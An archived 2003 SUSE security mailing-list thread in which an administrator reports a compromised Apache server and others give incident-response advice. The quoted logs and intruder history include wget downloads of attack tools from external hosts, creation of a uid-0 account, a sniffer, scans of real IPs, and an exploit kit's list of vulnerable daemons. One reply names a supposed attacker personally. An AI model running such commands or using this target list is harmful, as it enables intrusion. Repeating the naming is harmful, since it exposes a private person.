Help, Help, Somebody help!!! I Found somebody gain access using wwwrun, Download programs and try to hack into other server. Follows found in error_log of apache --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar] 0K ......... 100% 13.69 KB/s 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432] bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip] 0K .......... ......... 100% 65.37 KB/s 09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748] sh: line 1: ./bin.tar.gz: Permission denied gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain] 0K .......... ... 100% 3.37 KB/s 15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444] sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'? sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar] 0K ......... 100% 13.67 KB/s 20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432] tar: Error exit delayed from previous errors sh: line 1: cd: /tmp/": No such file or directory Also Found his command history: id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~. q q } q exit ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh ./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./scan 200.13.230.37 Please help, I Can't found where he can get in~~! -- Marco Lum Net Service Manager ___________________________________________________________________________________________ System Development Service Inter/Intra/Local-Area Networking Service VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com HK Service Company HK Service Consultants Limited
UNPOLUG the network cable and reinstall the machine on other NEW HDD
(preserve the actual HDD for further forensic investigations) - but UNPLUG
IT NOW!!!!!
----- Original Message -----
From: "Marco Lum"
Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________ _______________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan
Andrei :)
----- Original Message -----
From: "Marco Lum"
Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________ _______________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):
WARNING, this is a powerfull tool you can gain root access on many systems.
Use it at your own risk.
It scans for vulnerabilities in different OS and daemons:
The BIND scan:
Gains root access on all nonpatched boxes running linux with the following
bind
versions:
ISC BIND 8.2
ISC BIND 8.2.1
ISC BIND 8.2.2
ISC BIND 8.2.2-P3
ISC BIND 8.2.2-P5
ISC BIND 8.2.2-P7
The LPD scan:
Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd
from
distribution.
The FTPD scan:
Gains root access on all nonpatched boxes running the following OS/ftp
daemons:
Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
Debian potato [wu-ftpd_2.6.0-3.deb]
Debian potato [wu-ftpd_2.6.0-5.1.deb]
Debian potato [wu-ftpd_2.6.0-5.3.deb]
Debian sid [wu-ftpd_2.6.1-5_i386.deb]
Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
SuSE 7.0 [wuftpd.rpm]
SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
SuSE 7.1 [wuftpd.rpm]
SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
SuSE 7.2 [wuftpd.rpm]
SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
SuSE 7.3 [wuftpd.rpm]
SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Slackware 7.1
The SSHD scan:
Gains root access on all nonpatched boxes running the followin versions:
Linux:
SSH-1.5-1.2.25
SSH-1.5-1.2.26
SSH-1.5-1.2.27
SSH-1.5-1.2.30
SSH-1.5-1.2.31
SSH-1.99-OpenSSH_2.2.0p1
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3
OpenBSD 3.x:
OpenSSH 2.9.9 - 33
The RPC scan:
Gains root access on multiple RPC vulnerabilities involving
Linus/SunOS/Solaris.
The TELNED scan:
Gains root access on all nonpatched boxes running the following OS's:
Most of the BSD OS's
The POP3 scan:
Gains root access on all nonpatched boxes running QPOP 3.0b
For further upgrades send me new exploits at k1net1c@k1net1c.net
The SSL scan:
Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.
Spawns a shell uid=apache.
----- Original Message -----
From: "Radu Voicu"
curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan Andrei :)
----- Original Message ----- From: "Marco Lum"
To: "suse-security" Sent: Wednesday, September 03, 2003 7:43 PM Subject: [suse-security] Apache Gain Remote Shell Access Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use bind: Address already in use --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied chmod: invalid mode string: `x' sh: line 1: ./a.out: Permission denied Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M; cd /usr/local/games/ ls -ax wget www.vulturul.org/vulturul/bnc.tgz cd /tmp/" " socklist killall -9 nsl ls -ax rm -rf epcs2 rm -rf ns rm -rf nsl rm -rf p rm -rf pk ls -ax wget www.vulturul.org/vulturul/bnc.tgz tar xvfz bnc.tgz mv psybnc "~. " cd "~. " mv psybnc " " export PATH=:PATH ./" " id ls --color ./li ls --color ./p exec ./p 8003 id pwd cd .. cd .. ls -ax ls -ax --color rm -rf edu.gz rm -rf local.tar.gz rm -rf local cd 3du ls --colorls --color ./scan 200.13.230.37 ./scan 200.13.230.37 -d 6 ./scan 202.30.198.226 -d 6 /scan 202.186.250.157 ./scan ./scan 202.186.250.157 ./scan 202.186.250.157 -d 6 ./scan 64.106.104.84 -d 6 ./scan 64.106.104.84 -d 6 ./scan 128.119.213.136 -d 2 d .. cd .. ls -ax cd atd ls -ax ./osslmass2 mass.log ./osslmass2 mass.log cd ../atd ls -ax cd .. ls -ax --color pico ./pico mv pico /usr/bin pico ls -ax mv pico /usr/bin cp pico /usr/bin/pico cd 3du ls -ax --color cd .. wget http://geocities.com/supers7ar/boom.tar.gz tar xvfz boom.tar.gz cd boom ls -ax ./r00t./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2 ./r00t -t 193.231.142 -d 4 ./r00t -t 193.231.142 -d 7 ./r00t -t 193.231.142 -d 8 cd .. pwd wget http://geocities.com/supers7ar/sshup.tar.gz tar xvfz sshup.tar.gz cd ssh-3.0.1/ ls -ax cd .. rm -rf ssh-3.0.1/ rm -rf sshup.tar.gz ls -ax --color rm -rf boom.tar.gz cd ~. cd " ~.
q
q
}
q
exit
ls -ax wget www.vulturul.org/vulturul/linsniffer chmod +x linsniffer ./linsniffer ls -ax rm -rf linsniffer ls -ax --color id ./heh
./r00t -t 128.100.20 -d 8 ./r00t -t 193.231.142 -d 3 ./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
-- Marco Lum Net Service Manager
____________________________________________________________________________
_______________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not shure about that?
At least two problems. Execution of commands as user wwwrun and
local root compromise.
I hope the box has been disconnectet from the network already.
--
Stefan Tichy
Checked, No Root access gen. No CGI ACCESS - No log in access_log No Shell Access by wwwrun Play back his history, root access cannot be done BTW, what the hell "raver" Stefan Andreas Tichy wrote:
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not shure about that?
At least two problems. Execution of commands as user wwwrun and local root compromise.
I hope the box has been disconnectet from the network already.
-- Marco Lum Net Service Manager ___________________________________________________________________________________________ System Development Service Inter/Intra/Local-Area Networking Service VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com HK Service Company HK Service Consultants Limited
Checked, No Root access gen. No CGI ACCESS - No log in access_log No Shell Access by wwwrun Not infected but Linux.RST.B (Scan all bin/sbin/user/bin also check by hand, No unknow out going connection) Play back his history, root access cannot be done All task stop when I stop apache BTW, what is the hell "raver". Stefan Andreas Tichy wrote:
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not shure about that?
At least two problems. Execution of commands as user wwwrun and local root compromise.
I hope the box has been disconnectet from the network already.
-- Marco Lum Net Service Manager ___________________________________________________________________________________________ System Development Service Inter/Intra/Local-Area Networking Service VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com HK Service Company HK Service Consultants Limited
Marco Lum wrote:
Please help, I Can't found where he can get in~~!
i know serval ways to break into such a system: - installed PHP/Perl/CGI/whatever Script - known FTP Account (anonymous?!) with access to webdirs - Apache exploit (e.g. chunked bug) - SSL Exploit If your Box is well updated you can drop the last two possibilities (hopefully the box was ;). The others are well known flaws and, if you have a hosting box or so, you can't really control what other users install. Many scripts (whois etc.) don't really check for input. If it's your company's webserver you should know whats installed. But like the others already said: unplugg the box. Maybe you've the chance to check with chkrootkit (www.chkrootkit.org) if he had more access then the log shows. HTH and if you've any further questions, drop a line (or two ;) Sven
Marco Lum wrote:
Please help, I Can't found where he can get in~~!
Hm, unfortunately he/she knew, what to do and where to find funny things!
!!!! Emediately unplug the server, plugin a backup server and analyse the system and don't switch off after that. !!!!<< Looked for the sources on the mentioned websites: The hacker installed you a sniffer and can trace all your activity and passwds!
On the backupserver log all connections! Don't shut it down - many activities can be resolved in tmp and memory (they still reside on that system). After analysing the intrusion and finding traces to the hacker you can setup your box new! A hacker first wants to gain access and then install irc/and or/news/and or/an own warez or whatever ftp/and or/hacks to hack other servers. If you got rootkitted a netstat -tap | grep LISTEN or | grep ESTABLISHED will not help to find out (scan the server with another PC to find open ports instead). First, which services, damons and versions did you run? Which distro do you use?
Short Checklist<<
- check accounts in e/tc/passwd and /etc/shadow - check state of network connections with "netstat -tap" - check state of network devices with "ifconfig" for promiscous mode - check logfiles (see later) - check last users and logins with "last" - check time of server - this may bring you problems, if this server syncs your net - check configs of inetd/xinetd and other services - find hack directorys like "..." or " " with e.g.: find / -name "..." - find last modified files with "ls -latrc" and check prm-db (see later) - probe for trojans or rootkits
Check for rootkits!<< If you got rootkitted all analysetools and some system commands are useless, because they are replaced and disfunctional! Here's a small hint how to use:
Look at http://www.chkrootkit.org/ for further usage! Download chkrootkit.tar.gz from above website! tar xvfz chkrootkit.tar.gz cd chkrootkit make ./chkrootkit > /root/chkrootkit.log less /root/chkrootkit.log Look, what you get as output and google for hints if you got one!
Check your rpm-db<<
rpm -Va > /root/system.checked
check your logfiles, especially look at the /var/log/xferlog for suspiciois ftp transfers<<
mkdir /var/intl cp /root/system.checked /var/intl cp /root/chkrootkit.log /var/intl fgrep -i attempt /var/log/messages >/var/intl/attempt-log fgrep -i connect /var/log/messages >/var/intl/connects-log fgrep -i refused /var/log/messages >/var/intl/refused-log fgrep -i accepting /var/log/messages >/var/intl/accepted-log fgrep -i su: /var/log/messages >/var/intl/su-log fgrep -i unauthorized /var/log/messages >/var/intl/unauthorized-log fgrep -i sshd /var/log/messages >/var/log/sshd-log fgrep -i illegal /var/log/sshd-logs >/var/intl/ssh-illegal-log fgrep -i failed /var/log/sshd-logs >/var/intl/ssh-failed-log aide --check>/var/intl/aide.log tar kuip /var/intl/ -f intruders.tar mount /dev/fd0 /mnt/floppy cp intruders.tar /mnt/floppy example of an log at an intruded server:
less connects-log<<
Jun 10 18:30:16 server in.telnetd[41354]: connect from hack@123.45.67.89
last<<
jens ttyp3 ppp-39.ba.net Tue Jun 10 20:01 - crash (00:01) You find hints on who did something, if he/she wasn't nice enough to remove all traces.
check running processes<<
ps -ax > processes-log Look in processes-log for suspicious filenames.
Here you can find additional infos:<<
examples of intruded system's logfiles: http://www.rz.rwth-aachen.de/kommunikation/security/s30.php#logfiles a longer howto deintrude: http://www.cert.org/tech_tips/intruder_detection_checklist.html http://www.cert.org/tech_tips/root_compromise.html http://www.cert.org/tech_tips/unix_configuration_guidelines.html Philippe
participants (5)
-
Marco Lum
-
Philippe Vogel
-
Radu Voicu
-
Stefan Andreas Tichy
-
Sven 'Darkman' Michels